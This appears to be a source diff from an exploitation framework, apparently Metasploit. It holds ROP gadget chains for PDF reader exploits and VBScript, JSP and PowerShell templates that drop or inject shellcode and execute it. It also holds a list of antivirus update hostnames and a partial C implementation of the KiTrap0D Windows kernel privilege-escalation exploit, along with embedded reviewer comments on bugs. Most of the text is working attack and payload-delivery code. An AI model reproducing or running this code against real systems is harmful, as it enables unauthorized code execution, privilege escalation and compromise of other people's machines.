data/ropdb/reader.xml Normal file

@ -0,0 +1,132 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>9</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x2313d">pop ecx # ret</gadget>
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x0155a">pop edi # ret</gadget>
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x2d4de">pop ebx # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x44122">mov edx, ecx</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
<gadget offset="0x476ab">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>10</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x05016">pop edi # ret</gadget>
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x14241">pop ebx # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x4b49d">mov edx, ecx</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
<gadget offset="0x2a8df">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x55093">pop edi # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x60bc4">call eax # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
<gadget offset="0x463d0">pop ebx # ret</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
</gadgets>
</rop>
</db>
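Review bot: The label `DWORD dwMaximumSizeHigh` appears twice in a row in each of the three `<rop>` entries, and the second one (value `0x00001000`) is mislabelled. In the `CreateFileMappingA` argument order the slot after `dwMaximumSizeHigh` is `dwMaximumSizeLow`. Only the element text is affected, so the correction is `<gadget value="0x00001000">DWORD dwMaximumSizeLow</gadget>` for targets 9, 10 and 11.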


@ -1,5 +1,5 @@
Function %{var_func}()
%{var_shellcode}
%{var_shellcode} = "%{hex_shellcode}"
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@ -10,9 +10,11 @@ Function %{var_func}()
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
%{var_stream}.Write %{var_bytes}
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")


@ -39,11 +39,13 @@
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
}
else
}
else
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>


@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
%{shellcode}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

Binary file not shown.

Binary file not shown.

BIN
data/vncdll.x86.dll Executable file

Binary file not shown.


@ -0,0 +1,28 @@
www.es-web.sophos.com
www.es-web.sophos.com.edgesuite.net
www.es-web-2.sophos.com
www.es-web-2.sophos.com.edgesuite.net
www.dnl-01.geo.kaspersky.com
www.downloads2.kaspersky-labs.com
www.liveupdate.symantecliveupdate.com
www.liveupdate.symantec.com
www.update.symantec.com
www.update.nai.com
www.download797.avast.com
www.guru.avg.com
www.osce8-p.activeupdate.trendmicro.com
www.forefrontdl.microsoft.com
es-web.sophos.com
es-web.sophos.com.edgesuite.net
es-web-2.sophos.com
es-web-2.sophos.com.edgesuite.net
dnl-01.geo.kaspersky.com
downloads2.kaspersky-labs.com
liveupdate.symantecliveupdate.com
liveupdate.symantec.com
update.symantec.com
update.nai.com
download797.avast.com
guru.avg.com
osce8-p.activeupdate.trendmicro.com
forefrontdl.microsoft.com


@ -1,5 +1,6 @@
aspnet_client/
Autodiscover/
exchange/
ecp/
EWS/
Microsoft-Server-ActiveSync/

File diff suppressed because it is too large Load Diff


@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
rake yard

@ -0,0 +1 @@
Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103

Binary file not shown.


@ -0,0 +1,89 @@
/*!
* @file ResourceLoader.c
* @brief Helper functions for loading embedded resources.
*/
#include <Windows.h>
#include "common.h"
/*!
* @brief Load a resource from the given module as a raw array of bytes.
* @param hModule Handle to the module containing the resource.
* @param uResourceId ID of the resource to load.
* @param lpType The type of resource being loaded.
* @param pBuffer Pointer to the buffer that will receive the loaded resource.
* @param pBufferSize Pointer to the variable that will receive the size of \c pBuffer.
* @returns Indication of success or failure.
*/
DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize)
{
DWORD dwResult = FALSE;
DWORD dwResourceSize = 0;
LPBYTE pResource = NULL;
HRSRC hResource = NULL;
HGLOBAL hResData = NULL;
LPVOID lpResData = NULL;
*pBuffer = NULL;
*pBufferSize = 0;
do
{
if ((hResource = FindResourceA(hModule, MAKEINTRESOURCEA(uResourceId), lpType)) == NULL) {
dwResult = GetLastError();
dprintf("[RES] Unable to find resource %d type %s", uResourceId, lpType);
break;
}
if ((dwResourceSize = SizeofResource(hModule, hResource)) == 0) {
dwResult = GetLastError();
dprintf("[RES] Unable to find resource size for %d type %s", uResourceId, lpType);
break;
}
if ((pResource = (LPBYTE)malloc(dwResourceSize)) == NULL) {
dwResult = ERROR_NOT_ENOUGH_MEMORY;
dprintf("[RES] Unable to allocate memory for resource %d type %s size %u", uResourceId, lpType, dwResourceSize);
break;
}
if ((hResData = LoadResource(hModule, hResource)) == NULL) {
dwResult = GetLastError();
dprintf("[RES] Unable to load resource for %d type %s", uResourceId, lpType);
break;
}
if ((lpResData = LockResource(hResData)) == NULL) {
dwResult = GetLastError();
dprintf("[RES] Unable to lock resource for %d type %s", uResourceId, lpType);
break;
}
memcpy_s(pResource, dwResourceSize, lpResData, dwResourceSize);
// Locked resource don't need to be unlocked. If we get here, we've won!
dwResult = ERROR_SUCCESS;
*pBuffer = lpResData;
*pBufferSize = dwResourceSize;
} while (0);
if (dwResult != ERROR_SUCCESS && pResource != NULL) {
free(pResource);
}
return dwResult;
}
/*!
* @brief Free up memory that was allocated when loading the resource.
* @param lpBuffer Pointer to the allocated buffer.
* @returns \c ERROR_SUCCESS
*/
DWORD resource_destroy(LPBYTE lpBuffer)
{
if (lpBuffer != NULL)
{
free(lpBuffer);
}
return ERROR_SUCCESS;
}
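Review bot: `resource_extract_raw` copies the resource into the `malloc`'d `pResource` but then hands back the locked resource pointer with `*pBuffer = lpResData;`. The heap copy therefore leaks, and a caller that follows the documented contract and passes the buffer to `resource_destroy` ends up calling `free()` on memory that did not come from the heap. The assignment should be `*pBuffer = pResource;`. `dwResult` is also initialised to `FALSE`, which has the same value as `ERROR_SUCCESS`; starting from an error code such as `ERROR_INVALID_PARAMETER` would stop an unexpected early exit from reading as success. `pBuffer` and `pBufferSize` are dereferenced before any NULL check.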


@ -0,0 +1,11 @@
/*!
* @file ResourceLoader.h
* @brief Declarations of helper functions for loading embedded resources.
*/
#ifndef _ESCALATE_RESOURCELOADER_H
#define _ESCALATE_RESOURCELOADER_H
DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize);
DWORD resource_destroy(LPBYTE lpBuffer);
#endif


@ -0,0 +1,46 @@
#ifndef _ESCALATE_COMMON_H
#define _ESCALATE_COMMON_H
/*! @brief When defined, debug output is enabled on Windows builds. */
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#include <stdio.h>
#include <stdarg.h>
#include <string.h>
#define dprintf(...) real_dprintf(__VA_ARGS__)
#else
#define dprintf(...) do{}while(0);
#endif
/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
#define BREAK_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
/*! @brief Sets `dwResult` to `error`, prints debug output, then `break;` */
#define BREAK_WITH_ERROR( str, err ) { dwResult = err; dprintf( "%s. error=%d", str, dwResult ); break; }
/*! @brief Sets `dwResult` to the return value of `WASGetLastError()`, prints debug output, then does `break;` */
#define BREAK_ON_WSAERROR( str ) { dwResult = WSAGetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `continue;` */
#define CONTINUE_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); continue; }
/*! @brief Close a service handle if not already closed and set the handle to NULL. */
#define CLOSE_SERVICE_HANDLE( h ) if( h ) { CloseServiceHandle( h ); h = NULL; }
/*! @brief Close a handle if not already closed and set the handle to NULL. */
#define CLOSE_HANDLE( h ) if( h ) { DWORD dwHandleFlags; if(GetHandleInformation( h , &dwHandleFlags)) CloseHandle( h ); h = NULL; }
#ifdef DEBUGTRACE
/*!
* @brief Output a debug string to the debug console.
* @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed
* using Visual Studio's _Output_ window, _DebugView_ from _SysInternals_, or _Windbg_.
*/
static void real_dprintf(char *format, ...) {
va_list args;
char buffer[1024];
va_start(args,format);
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer);
}
#endif
#endif
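Review bot: `real_dprintf` calls `va_start(args,format)` with no matching `va_end`; add `va_end(args);` after the `vsnprintf_s` call. The non-debug stub `#define dprintf(...) do{}while(0);` carries its own semicolon, so `if (x) dprintf(...); else ...` will not compile in release builds; drop the trailing semicolon from the macro. `CLOSE_HANDLE` and `CLOSE_SERVICE_HANDLE` expand to a bare `if`, which captures a following `else` at the call site; wrapping each body in `do { ... } while (0)` avoids that.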


@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d", "kitrap0d\kitrap0d.vcxproj", "{6B678096-E18A-427A-A8A3-C268AD2E12B8}"
ProjectSection(ProjectDependencies) = postProject
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D} = {DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}
EndProjectSection
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d_payload", "kitrap0d_payload\kitrap0d_payload.vcxproj", "{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.ActiveCfg = Debug|Win32
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.Build.0 = Debug|Win32
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.ActiveCfg = Release|Win32
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.Build.0 = Release|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.ActiveCfg = Debug|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.Build.0 = Debug|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.ActiveCfg = Release|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -0,0 +1,497 @@
/*!
* @file kitrap0d.c
* @brief A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
* @remark See http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
* @remark Known Bugs:
* - Windows NT4 fails to map the NULL page, (exit code 'NTAV').
* - Windows 2000 fails to find the VDM_TIB size (something else is wrong)
* - Windows 2008 Storage Server has 16-bit applications disabled by default
* - Windows 2008 Storage Server is also missing twunk_16.exe, has debug.exe
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include <stdio.h>
#include "../common/common.h"
#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include "../common/ResourceLoader.h"
#include "resource.h"
#define PAGE_SIZE 0x1000
enum { SystemModuleInformation = 11 };
typedef struct
{
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct CodeSignature
{
UCHAR Signature[16];
DWORD Version;
};
/*!
* @brief List of code signatures used when searching kernel memory.
* @remark These are generated using kd -kl -c 'db nt!Ki386BiosCallReturnAddress;q'
*/
struct CodeSignature CodeSignatures[] = {
{ "\x64\xA1\x1C\x00\x00\x00\x5A\x89\x50\x04\x8B\x88\x24\x01\x00\x00", 0 }, // Windows NT4
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 1 }, // Windows 2000
{ "\x64\xA1\x1C\x00\x00\x00\x5F\x8B\x70\x04\xB9\x84\x00\x00\x00\x89", 1 }, // Windows 2000 SP4 Advanced Server
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 2 }, // Windows XP
{ "\xA1\x1C\xF0\xDF\xFF\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00\x00", 3 }, // Windows 2003
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 3 }, // Windows .NET
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 4 }, // Windows Vista
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 5 }, // Windows 2008
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 6 }, // Windows 7
{ "", -1 }
};
/*!
* @brief Scan the appropriate kernel image for the correct offset.
* @retval TRUE An offset was found.
* @retval FALSE An offset was not found.
*/
BOOL kitrap0d_scan_kernel(PDWORD KernelBase, PDWORD OffsetFromBase)
{
DWORD dwResult = ERROR_SUCCESS;
FARPROC NtQuerySystemInformation = NULL;
HMODULE hKernel = NULL;
HMODULE hNtdll = NULL;
PIMAGE_DOS_HEADER DosHeader = NULL;
PIMAGE_NT_HEADERS PeHeader = NULL;
PIMAGE_OPTIONAL_HEADER OptHeader = NULL;
PBYTE ImageBase = NULL;
HKEY MmHandle = NULL;
OSVERSIONINFO os = { 0 };
SYSTEM_MODULE_INFORMATION ModuleInfo = { 0 };
DWORD PhysicalAddressExtensions = 0;
DWORD DataSize = 0;
ULONG i = 0;
ULONG x = 0;
// List of versions we have code signatures for.
enum {
MICROSOFT_WINDOWS_NT4 = 0,
MICROSOFT_WINDOWS_2000 = 1,
MICROSOFT_WINDOWS_XP = 2,
MICROSOFT_WINDOWS_2003 = 3,
MICROSOFT_WINDOWS_VISTA = 4,
MICROSOFT_WINDOWS_2008 = 5,
MICROSOFT_WINDOWS_7 = 6,
} Version = MICROSOFT_WINDOWS_7;
do
{
hNtdll = GetModuleHandle("ntdll");
if (!hNtdll) {
BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetModuleHandle ntdll failed", ERROR_INVALID_HANDLE);
}
// NtQuerySystemInformation can be used to find kernel base address
NtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetProcAddress NtQuerySystemInformation failed", ERROR_INVALID_HANDLE);
}
// Determine kernel version so that the correct code signature is used
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if (!GetVersionEx(&os)) {
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx failed");
}
dprintf("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx() => %u.%u", os.dwMajorVersion, os.dwMinorVersion);
if (os.dwMajorVersion == 4 && os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_NT4;
}
if (os.dwMajorVersion == 5) {
if (os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_2000;
}
if (os.dwMinorVersion == 1) {
Version = MICROSOFT_WINDOWS_XP;
}
if (os.dwMinorVersion == 2) {
Version = MICROSOFT_WINDOWS_2003;
}
}
if (os.dwMajorVersion == 6) {
if (os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_VISTA;
}
if (os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_2008;
}
if (os.dwMinorVersion == 1) {
Version = MICROSOFT_WINDOWS_7;
}
}
// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address
NtQuerySystemInformation(SystemModuleInformation, &ModuleInfo, sizeof(ModuleInfo), NULL);
dprintf("[KITRAP0D] kitrap0d_scan_kernel. NtQuerySystemInformation() => %s@%p", ModuleInfo.Module[0].ImageName, ModuleInfo.Module[0].Base);
// Load the kernel image specified
hKernel = LoadLibrary(strrchr(ModuleInfo.Module[0].ImageName, '\\') + 1);
if (!hKernel) {
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. LoadLibrary failed");
}
// Parse image headers
*KernelBase = (DWORD)ModuleInfo.Module[0].Base;
ImageBase = (PBYTE)hKernel;
DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
OptHeader = &PeHeader->OptionalHeader;
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Searching for kernel %u.%u signature: version %d...", os.dwMajorVersion, os.dwMinorVersion, Version);
for (x = 0;; x++)
{
if (CodeSignatures[x].Version == -1) {
break;
}
if (CodeSignatures[x].Version != Version) {
continue;
}
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Trying signature with index %d", x);
// Scan for the appropriate signature...
for (i = OptHeader->BaseOfCode; i < OptHeader->SizeOfCode; i++)
{
if (memcmp(&ImageBase[i], CodeSignatures[x].Signature, sizeof CodeSignatures[x].Signature) == 0)
{
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Signature found %#x bytes from kernel base", i);
*OffsetFromBase = i;
FreeLibrary(hKernel);
return TRUE;
}
}
}
} while (0);
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Code not found, the signatures need to be updated for this kernel");
if (hKernel) {
FreeLibrary(hKernel);
}
return FALSE;
}
/*!
* @brief Grab a useful Handle to NTVDM.
* @param cpProgram Path to the program to invoke.
* @param hProcess Pointer to the variable that will receive the process handle.
* @retval TRUE Handle acquisition succeeded.
* @retval TRUE Handle acquisition failed.
*/
BOOL kitrap0d_spawn_ntvdm(char * cpProgram, HANDLE * hProcess)
{
DWORD dwResult = ERROR_SUCCESS;
PROCESS_INFORMATION pi = { 0 };
STARTUPINFO si = { 0 };
ULONG i = 0;
do
{
si.cb = sizeof(STARTUPINFO);
// Start the child process, which should invoke NTVDM...
if (!CreateProcess(cpProgram, cpProgram, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess failed");
}
dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess(\"%s\") => %u", cpProgram, pi.dwProcessId);
// Get more access
*hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, pi.dwProcessId);
if (*hProcess == NULL)
{
TerminateProcess(pi.hProcess, 'SPWN');
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess failed");
}
dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess(%u) => %#x", pi.dwProcessId, *hProcess);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
} while (0);
if (dwResult == ERROR_SUCCESS) {
return TRUE;
}
return FALSE;
}
/*!
* @brief Find a suitable exe to host the exploit in.
* @param cpOutput Buffer that will contain the path to the executable which will
* host the exploit.
* @param dwOutputSize Size of the \c cpOutput buffer.
* @retval TRUE Found a valid exe to host the exploit in.
* @retval FALSE Unable to find a valid exe to host the exploit in.
*/
BOOL elevate_via_exploit_getpath( char *cpOutput, DWORD dwOutputSize )
{
DWORD dwResult = ERROR_SUCCESS;
char cWinDir[MAX_PATH] = {0};
DWORD dwIndex = 0;
char * cpFiles[] = { "twunk_16.exe",
"debug.exe",
"system32\\debug.exe",
NULL };
do
{
if( !GetWindowsDirectory( cWinDir, MAX_PATH ) )
BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_getpath. GetWindowsDirectory failed" );
while( TRUE )
{
char * cpFileName = cpFiles[dwIndex];
if( !cpFileName )
break;
if ( _snprintf_s( cpOutput, dwOutputSize, dwOutputSize - 1, "%s%s%s", cWinDir,
cWinDir[ strlen(cWinDir) - 1 ] == '\\' ? "" : "\\", cpFileName ) == -1 )
{
dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Path truncation: %s", cpOutput );
break;
}
dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Trying: %s", cpOutput );
if( GetFileAttributes( cpOutput ) != INVALID_FILE_ATTRIBUTES )
return TRUE;
memset( cpOutput, 0, dwOutputSize );
dwIndex++;
}
} while(0);
return FALSE;
}
/*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
dprintf("[KITRAP0D] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
/*!
* @breif Entry point for the KiTrap0D exploit.
* @remark This is known as CVE-2010-0232.
* @param hElevateModule Handle to the DLL which contains the kitrap0d_payload DLL.
* @param lpPayload Pointer to the shellcode to run on successful exploitation.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS The exploit worked as expected.
* @retval ERROR_NOT_SUPPORTED The exploit is not supported on this platform.
*/
DWORD elevate_via_exploit_kitrap0d(HMODULE hElevateModule, LPVOID lpPayload)
{
DWORD dwResult = ERROR_SUCCESS;
HANDLE hVdm = NULL;
HANDLE hThread = NULL;
